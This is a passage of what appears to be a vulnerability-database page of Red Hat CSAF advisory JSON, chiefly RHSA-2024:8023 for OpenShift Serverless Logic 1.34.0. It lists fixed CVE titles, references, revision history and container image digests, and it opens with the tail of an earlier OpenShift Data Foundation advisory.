"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
}
]
}
RHSA-2024_8023
Vulnerability from csaf_redhat - Published: 2024-10-14 00:59 - Updated: 2024-12-18 04:38Summary
Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update & enhancements
Notes
Topic
Release of OpenShift Serverless Logic 1.34.0
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This release includes security, bug fixes, and enhancements.
Security Fix(es):
* axios: axios: Server-Side Request Forgery (CVE-2024-39338)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
For more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Release of OpenShift Serverless Logic 1.34.0\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "This release includes security, bug fixes, and enhancements.\n\nSecurity Fix(es):\n\n* axios: axios: Server-Side Request Forgery (CVE-2024-39338)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\nFor more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8023",
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2309758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309758"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8023.json"
}
],
"title": "Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update \u0026 enhancements",
"tracking": {
"current_release_date": "2024-12-18T04:38:42+00:00",
"generator": {
"date": "2024-12-18T04:38:42+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2024:8023",
"initial_release_date": "2024-10-14T00:59:58+00:00",
"revision_history": [
{
"date": "2024-10-14T00:59:58+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-14T00:59:58+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-18T04:38:42+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "8Base-Openshift-Serverless-1.34",
"product": {
"name": "8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_serverless:1.34::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Serverless"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"product": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"product_id": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"product": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"product_id": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"product_id": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"product_id": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"product": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"product_id": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8\u0026tag=1.34.0-2"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"product": {
"name": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"product_id": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-management-console-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"product": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"product_id": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"product": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"product_id": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"product": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"product_id": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8\u0026tag=1.34.0-6"
}
}
},
{
